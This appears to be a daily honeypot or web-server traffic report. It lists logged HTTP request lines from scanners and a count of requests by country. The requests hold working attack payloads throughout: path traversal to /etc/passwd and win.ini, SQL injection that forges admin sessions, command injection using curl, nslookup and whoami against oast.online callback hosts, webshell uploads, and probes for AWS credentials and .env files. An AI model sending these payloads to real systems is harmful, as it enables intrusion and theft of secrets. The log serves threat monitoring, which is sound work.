6874GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1
6924GET /common/snqpu.txt HTTP/1.1
6934POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1
6984POST /openam/json/realms/root/authenticate HTTP/1.1
7014POST /management/export.php?filename=$(echo+’’+>+fvengvbwqjex.php)&type=pdf HTTP/1.1
7104GET /Login.aspx HTTP/1.1
7164GET /?–configPath=/nuclei_test/4406259714 HTTP/1.1
7184POST /chat/completions HTTP/1.1
7204GET /service-worker.js?local_access_token=2xXagqs0ap6E0KaAyiQOmwI9rEa HTTP/1.1
7234GET /-/media/doo-doo.ashx HTTP/1.1
7264GET /~projects HTTP/1.1
7284POST /api/v2/templates/ HTTP/1.1
7374POST /cgi-bin/skk_get.cgi HTTP/1.1
7384GET /toolbox-resource/../serverconfig.xml HTTP/1.1
7404POST /api/v2/observables/extended HTTP/1.1
7424GET /javadoc/releases/javadoc/1.0.0//raw/..%5c..%2f..%2f..%2f..%2f..%2freposilite.db HTTP/1.1
7454GET /W6wlQx.txt HTTP/1.1
7534GET /html/usr/share/doc/hostname/copyright%3f HTTP/1.1
7684GET /cpanel.php HTTP/1.1
7694GET /bin/cron.php HTTP/1.1
7704GET /cache/index.tpl.php HTTP/1.1
7714POST /api/v1/livechat/sms-incoming/twilio HTTP/1.1
7724GET /en-US/login HTTP/1.1
7804GET /mailinspector/login.php HTTP/1.1
7874GET /controlloLogin.js HTTP/1.1
7884GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=http%3A%2F%2fxxx.xxx.xxx.xxx%2Fadmin%2Fmaster%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge=wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto HTTP/1.1
7914POST /api/gen/clients/csharp HTTP/1.1
7924POST /include/file.php HTTP/1.1
7954POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1
8074GET /chaosblade?cmd=$(id) HTTP/1.1
8104GET /api/subscriber HTTP/1.1
8124POST /api/v2/open/rowsInfo HTTP/1.1
8134GET /rest/api/latest/repos HTTP/1.1
8144GET /login.zul HTTP/1.1
8194GET /404%0dnew-header:value%0da: HTTP/1.1
8384GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1
8394GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://c:/windows/win.ini HTTP/1.1
8414GET /cgi-bin/ExportLogs.sh HTTP/1.1
8424GET /wp-content/uploads/cfom_files/2xxagq14eba7wpm4ytahpa571zi.php HTTP/1.1
8434GET /?phonepe_action=curltestPhonePe&url=http://d0or1j3jkkn1q8dabd70xhjz6ak398ep5.oast.online HTTP/1.1
8444POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.d0or1j3jkkn1q8dabd70maa1okkw7uue6.oast.online) HTTP/1.1
8474POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=2xXagq14ebA7wPM4ytahPA571zI.pHp HTTP/1.1
8524POST /ubus/ HTTP/1.1
8544POST /admin/asign-single-student-subjects.php HTTP/1.1
8554GET /2xXafVU2X3os24t7U4ZiPgtUkcW.jsp HTTP/1.1
8624GET /index.php/video/?dl=aHR0cHM6Ly9vYXN0Lm1lLw== HTTP/1.1
8634GET /api/get-browser-snapshot?snapshot_path=/etc/passwd HTTP/1.1
8654POST /alerts/alertConfigField.php HTTP/1.1
8674POST /alerts/alertLightbox.php HTTP/1.1
8684GET /2xXagqGHG6rH72T2vsrWn0RYvLY HTTP/1.1
8694GET /cgi-bin/downloadFlile.cgi?payload=ls>../2xXagqGHG6rH72T2vsrWn0RYvLY HTTP/1.1
8734POST /modules/appagebuilder/apajax.php?rand=2022457874423 HTTP/1.1
8744GET /api/2xXafqrnKozWkw5AnJwUkioa5fM HTTP/1.1
8754GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d0or1j3jkkn1q8dabd70b5ro5xokjga41.oast.online%22%29%7D/ HTTP/1.1
8764GET /delsnap.pl?name=
8774POST /hms/admin/ HTTP/1.1
8794POST /templates/default/html/windows/right.php HTTP/1.1
8804GET /set_safety.shtml?r=52300 HTTP/1.1
8814GET /admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5–+ HTTP/1.1
8824GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5(999999999),8,9,10,11–+ HTTP/1.1
8834GET /sysinit.shtml?r=52300 HTTP/1.1
8844GET /admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10–+ HTTP/1.1
8864GET /booking.php?car_id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10–+ HTTP/1.1
8874GET /admin/index.php?page=home HTTP/1.1
8934GET /live_check.shtml HTTP/1.1
8944GET /authenticationendpoint/2xxafwgwdo4igbwcgodrsm5alyf.jsp HTTP/1.1
9024GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1
9034GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1
9114GET /asyncrenderer/%7B%7Burl%7D%7D?clientId={{id}}&timeout=500&wiki=xwiki HTTP/1.1
9124GET /bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view HTTP/1.1
9154POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1
9274GET /_images/qidPCO HTTP/1.1
9294POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%272xXagYhPcaaf6BwG8HRDOpJGBee%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+IpAddress=%2789.39.121.48%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27%23 HTTP/1.1
9304GET /api/v1/cav/client/status/../../admin/options HTTP/1.1
9324GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1
9334GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://d0or1j3jkkn1q8dabd70tj69w3qe3uwu7.oast.online/patrowl.svg HTTP/1.1
9374POST /wp-job-portal-jobseeker-controlpanel/jobs HTTP/1.1
9404POST /api/sys/login HTTP/1.1
9434POST /cmisatom/cmis-online/query HTTP/1.1
9444POST /models?url=http%3a//d0or1j3jkkn1q8dabd705shtiwn56zxem.oast.online HTTP/1.1
9454POST /opencms/cmisatom/cmis-online/query HTTP/1.1
9474POST /api/sys/set_passwd HTTP/1.1
9514GET /KDemDzZ5K9.php HTTP/1.1
9574POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1
9634POST /api/2.0/mlflow/model-versions/create HTTP/1.1
9644GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1
9654POST /api/2.0/mlflow/registered-models/create HTTP/1.1
9684POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1
9714POST /api/jmeter/download/files HTTP/1.1
9724GET /forms/doLogin?login_username=admin&password=password$(curl%20d0or1j3jkkn1q8dabd70pe1f3jpet6e6y.oast.online)&x=0&y=0 HTTP/1.1
9754POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
9774GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2xXafHKbJge9RMdNzqHyS88K70p HTTP/1.1
9794GET /api/auth/cognito/callback?access_token=xdtmfulh&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJjb2duaXRvOnVzZXJuYW1lIjoiaWpocm5la3FqZSIsImVtYWlsIjoie3tlbWFpbH19In0=. HTTP/1.1
9804POST /spcgi.cgi HTTP/1.1
9844POST /api/v1/snapshots HTTP/1.1
9854GET /sreczyl HTTP/1.1
9864POST /goform/aspForm HTTP/1.1
9874POST /ajax.php?action=save_user HTTP/1.1
9884GET /2xXagAsXZSYOyfzioJZIv0W2Jbi.jsp HTTP/1.1
9914POST /api/router/mesh/status HTTP/1.1
9924GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).d0or1j3jkkn1q8dabd70o8xqa8z1jcan9.oast.online%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22xxx.xxx.xxx.xxx%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1
9934GET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://d0or1j3jkkn1q8dabd701mbbk3rgqwaj1.oast.online/ HTTP/1.1
9954POST /v1/warehouse/pending-events HTTP/1.1
9974GET /2xXag7oxOkzB1uqVziE6Fo4Lo4X HTTP/1.1
10004POST //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
10044POST /cfusion/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
10064POST /CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1
10084POST /minio/bootstrap/v1/verify HTTP/1.1
10712PATCH /mgmt/tm/auth/user/xQEGM HTTP/1.1
10821GET /app/Providers/AwsServiceProvider.php HTTP/1.1
10851GET /apps/config/aws_parameters.yml HTTP/1.1
10891GET /assets/css/style.css HTTP/1.1
10901GET /assets/js/app.js HTTP/1.1
10911GET /assets/js/aws-config.js HTTP/1.1
11031GET /api/signin HTTP/1.1
11041GET /api/signup HTTP/1.1
11081GET /api/reset HTTP/1.1
11091GET /api/session HTTP/1.1
11101GET /api/settings.json HTTP/1.1
11161GET /admin/debug.php HTTP/1.1
11181GET /admin/logs/error.log HTTP/1.1
11201GET /admin/sysadmin/index.php HTTP/1.1
11211GET /app/Secrets/AWSKeys.php HTTP/1.1
11271GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1
11311GET /.prettierrc.json HTTP/1.1
11321GET /.python-version HTTP/1.1
11341GET /.rvmrc HTTP/1.1
11381GET /app/aws/credentials.php HTTP/1.1
11421GET /app/config/aws.php HTTP/1.1
11431GET /app/Config/aws_sdk.php HTTP/1.1
11441GET /app/config/cloud/aws.php HTTP/1.1
11451GET /app/config/services/aws.php HTTP/1.1
11471GET /app/etc/config.php HTTP/1.1
11511GET /api/password HTTP/1.1
11561GET /api/authenticate HTTP/1.1
11571GET /api/aws/credentials.json HTTP/1.1
11581GET /api/config.php HTTP/1.1
11591GET /api/config/aws.php HTTP/1.1
11601GET /api/debug.php HTTP/1.1
11611GET /api/forgot HTTP/1.1
11641GET /api/logout HTTP/1.1
11651GET /api/logs/error.log HTTP/1.1
11741GET /config.php.inc~ HTTP/1.1
11771GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20d0or1j3jkkn1q8dabd70cp3pg75a874tf.oast.online%20-H%20’User-Agent%3a%20uHRuvD’; HTTP/1.1
11831GET /browse.php HTTP/1.1
11851GET /cgi-bin/1.php HTTP/1.1
11861GET /check-site.php HTTP/1.1
11921GET /data/aws-creds.yml HTTP/1.1
11931GET /data/config.env HTTP/1.1
11941PUT /v1/agent/check/register HTTP/1.1
11951PUT /v1/agent/check/deregister/2xXagoujux6oT9ALK1SK3dyfiRw HTTP/1.1
11961GET /config/aws-credentials.php HTTP/1.1
11991GET /config/aws_config.php HTTP/1.1
12011GET /config/aws_settings.php HTTP/1.1
12031GET /config/cloud/aws_config.json HTTP/1.1
12041GET /config/cloud/aws_keys.php HTTP/1.1
12061GET /config/test.config.php HTTP/1.1
12071GET /configs/app.env HTTP/1.1
12081GET /configs/db.env HTTP/1.1
12091GET /configs/mail/smtp.php HTTP/1.1
12101GET /configs/prod.env HTTP/1.1
12111GET /configs/staging.env HTTP/1.1
12121GET /config/aws_sdk_settings.php HTTP/1.1
12151GET /.stylelintrc.json HTTP/1.1
12161GET /authenticate HTTP/1.1
12171GET /aws-config.json HTTP/1.1
12181GET /aws-credentials.json HTTP/1.1
12221GET /aws/aws_secret_config.php HTTP/1.1
12241GET /aws/config/aws_auth.php HTTP/1.1
12251GET /aws/credentials.bak HTTP/1.1
12261GET /aws/creds/aws_keys.yml HTTP/1.1
12271GET /aws/env/aws_env_config.json HTTP/1.1
12281GET /aws/keys.conf HTTP/1.1
12351GET /aws/aws_settings.json HTTP/1.1
12441GET /aws_data/aws_keys.yml HTTP/1.1
12451GET /aws_settings/aws_keys.php HTTP/1.1
12511GET /backend/aws_credentials.json HTTP/1.1
12541GET /backend/logs/access.log HTTP/1.1
12721PUT /mdm/checkin HTTP/1.1
12731GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1
12811DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1
12911PUT /goform/AccessControl HTTP/1.1
13281PUT /api/v2/simulation HTTP/1.1
13491GET /../../../../etc/passwd HTTP/1.1
13581PUT /api/2.0/mlflow-artifacts/artifacts/2xXagLt7BvY4ycVqNxvXhgEvQWD HTTP/1.1
13641GET /.debug HTTP/1.1
13651GET /.debugbar HTTP/1.1
13701GET /.tool-versions HTTP/1.1
13711GET /16.php HTTP/1.1
13721GET /2phpmyadmin/index.php HTTP/1.1
13861GET /.eslintrc HTTP/1.1
13871GET /.eslintrc.json HTTP/1.1
13891GET /.git/objects/pack/pack-*.idx HTTP/1.1
13901GET /.github/workflows/ci.yml HTTP/1.1
13981GET /oauth/idp/.well-known/openid-configuration HTTP/1.1
14521GET /symfony/app_dev.php HTTP/1.1
14531GET /symfony/config_dev.php HTTP/1.1
14541GET /symfony/phpinfo.php HTTP/1.1
14551GET /symlink403.php HTTP/1.1
14581GET /signup HTTP/1.1
14621GET /sites/default/settings.bak.php HTTP/1.1
14771GET /test-php-version.php HTTP/1.1
14881GET /tmp/config.php HTTP/1.1
14941GET /secrets/aws_keys.json HTTP/1.1
14961GET /secure/aws_secrets.py HTTP/1.1
14981GET /server/aws_auth.php HTTP/1.1
14991GET /server/config.php HTTP/1.1
15011GET /server/logs/debug.log HTTP/1.1
15031GET /sites/default/settings.old.php HTTP/1.1
15061GET /react_app/src/aws-config.js HTTP/1.1
15081GET /register HTTP/1.1
15091GET /reset HTTP/1.1
15101GET /resources/aws.yml HTTP/1.1
15111GET /resources/aws_config.yml HTTP/1.1
15121GET /resources/config/aws_settings.json HTTP/1.1
15131GET /resources/env.dev HTTP/1.1
15141GET /resources/env.example HTTP/1.1
15151GET /resources/env.local HTTP/1.1
15161GET /server/settings.json HTTP/1.1
15191GET /src/aws/credentials.json HTTP/1.1
15201GET /src/config/aws_keys.py HTTP/1.1
15211GET /src/secrets/aws.yml HTTP/1.1
15221GET /src/secrets/aws_config.php HTTP/1.1
15251GET /serverless/aws-config.yml HTTP/1.1
15271GET /services/aws/config.php HTTP/1.1
15281GET /services/aws_keys.json HTTP/1.1
15291GET /search/s.php HTTP/1.1
15301GET /settings.back HTTP/1.1
15311GET /settings.debug HTTP/1.1
15321GET /settings.dev.php HTTP/1.1
15331GET /settings.env HTTP/1.1
15381GET /settings.yaml HTTP/1.1
15401GET /settings/aws_secrets.yml HTTP/1.1
15411GET /routes/api.php.bak HTTP/1.1
15421GET /routes/channels.php.bak HTTP/1.1
15441PUT /poc.jsp/ HTTP/1.1
15451PUT /2xXag5Aum3Ax283t9kbD3DVqF8V.jsp/ HTTP/1.1
15491GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1
15501GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1
15511GET /wp-includes/customize/autoload_classmap.php HTTP/1.1
15521GET /wp/wp-config.backup.php HTTP/1.1
15531GET /wp/wp-config.php.c HTTP/1.1
15541GET /wp/wp-config.php.staging HTTP/1.1
15551GET /wso403.php HTTP/1.1
15581GET /debug/ HTTP/1.1
15601GET /_error HTTP/1.1
15621GET /_profiler HTTP/1.1
15651GET /_wdt HTTP/1.1
15671GET /2xXagkHxtKg2bcEcC4m2WVHm6An/../../ThinVnc.ini HTTP/1.1
15781PUT /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml HTTP/1.1
15821PUT /fileserver/2xXagyJ5gasVQd9JvjilKU9CR5j.txt HTTP/1.1
15941PUT /meta HTTP/1.1
15981GET /webpack.config.ts HTTP/1.1
15991GET /website-test.php HTTP/1.1
16011GET /wordpress/wp-config.php.b HTTP/1.1
16021GET /wordpress/wp-config.php.bak HTTP/1.1
16031POST /-/jira/login/oauth/access_token HTTP/1.1
16041GET /tmp/env HTTP/1.1
16051GET /tmp/env.bak HTTP/1.1
16061GET /tmp/env.save HTTP/1.1
16071GET /tmp/error.log HTTP/1.1
16131GET /uploads/upload.form.php HTTP/1.1
16181GET /var/log/exception.log HTTP/1.1
16231GET /wordpress/wp-config.php.original HTTP/1.1
16251GET /wp-admin/css/colors/cloud.php HTTP/1.1
16371GET /wp-content/themes/astra/inc/network.php HTTP/1.1
16381GET /wp-includes/block-supports/wp-conflg.php HTTP/1.1
16391PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
16401GET /var/www/phpinfo.php HTTP/1.1
16431GET /verification.php HTTP/1.1
16471GET /web/aws/credentials.php HTTP/1.1
16481GET /web/environment.php HTTP/1.1
16501GET /forgot HTTP/1.1
16561GET /frontend/static/aws-config.js HTTP/1.1
16571GET /gallery/zp-core/setup/index.php HTTP/1.1
16581GET /h.php HTTP/1.1
16621GET /resources/env.prod HTTP/1.1
16631GET .//WEB-INF/web.xml HTTP/1.1
16641GET .//WEB-INF/weblogic.xml HTTP/1.1
16671GET /dev/settings.debug HTTP/1.1
16681GET /dev/settings.dev HTTP/1.1
16691GET /dev/settings.local HTTP/1.1
16731GET /docker-compose.override.yml HTTP/1.1
16761POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
16771GET /file/../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
16781GET /file/../../../../../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
16821GET /include/mail.php HTTP/1.1
16851GET /index_dev.php HTTP/1.1
16861GET /info.php.1 HTTP/1.1
16911GET /infra/aws_creds.yml HTTP/1.1
16921GET /infrastructure/aws_keys.json HTTP/1.1
16941GET /internal/aws/creds.json HTTP/1.1
16951PUT /2xXafNONYWEwvWczbdmQV8uhXdK.txt HTTP/1.1
16961PUT /cgi-bin/2FtrEb.txt HTTP/1.1
16971PUT /cgi-bin/cf1PXB.txt HTTP/1.1
16981DELETE /cgi-bin/cf1PXB.txt HTTP/1.1
16991GET /environment.yml HTTP/1.1
17021GET /info03.php HTTP/1.1
17061GET /debugbar HTTP/1.1
17101GET /deploy/aws_secrets.yml HTTP/1.1
17161GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1
17191GET /configuration/aws_keys.yml HTTP/1.1
17201GET /configuration/cloud/aws.yml HTTP/1.1
17221GET /containers/aws_creds.json HTTP/1.1
17241GET /core/aws/keys.php HTTP/1.1
17271GET /css/sgd.php HTTP/1.1
17331GET /env.yml HTTP/1.1
17351GET /env/aws_config.js HTTP/1.1
17361DELETE /actuator/gateway/routes/2xXafNucfd13haaplSKKoL5PQgV HTTP/1.1
17511GET /data/env.bak HTTP/1.1
17521GET /data/env.json HTTP/1.1
17531GET /data/env.txt HTTP/1.1
17651GET /phpmyadmin2018/index.php HTTP/1.1
17661GET /phpMyAdmin5.2/index.php HTTP/1.1
17681GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
17691GET /google-services.json HTTP/1.1
17711GET /amplify-config.js HTTP/1.1
17721GET /.azure/azureProfile.json HTTP/1.1
17731GET /settings.py.bak HTTP/1.1
17741GET /phpmyadmin5/index.php HTTP/1.1
17761GET /php_status.php HTTP/1.1
17771GET /pip.php HTTP/1.1
17821GET /resources/env.testing HTTP/1.1
17851GET /private/aws-config.json HTTP/1.1
17861GET /private/aws_secrets.json HTTP/1.1
17931GET /protected/aws_credentials.php HTTP/1.1
17971GET /public/css/main.css HTTP/1.1
17981GET /public/js/aws-exports.js HTTP/1.1
17991GET /public/js/bundle.js HTTP/1.1
18011POST /login/ HTTP/1.1
18141GET /manual/en/book.opcache.php HTTP/1.1
18171GET /js/secrets/aws-exports.js HTTP/1.1
18191GET /lamp/test.php HTTP/1.1
18221GET /lib/aws/aws_config.py HTTP/1.1
18231GET /lib/cloud/aws_keys.php HTTP/1.1
18341GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
18381GET /modules/aws/aws_config.php HTTP/1.1
18391GET /naik_dong.php HTTP/1.1
18491GET /past.php HTTP/1.1
18561GET /logout HTTP/1.1
18591GET /logs/stacktrace.log HTTP/1.1
18621GET /password HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
05234AE
1678FR
2270BG
3193US
486NL
580DE
676CN
765PL
851VN
939RU
1016LT
1113AZ
1213AU
1312CA
147GB
157RO
166BR
175JP
185SC
195GH
204UA
214IN
224MD
234PT
244SG
252BE
262KR
272IR
282KZ
292TH
302IE
312CO
322IT
331AR
341XK
351AT
361MC
371NG
381HK
391SE
401ES
411AL

Related

Report: 2025-05-23
·359 words
Repport Daily
Report: 2025-05-22
·296 words
Repport Daily
Report: 2025-05-21
·512 words
Repport Daily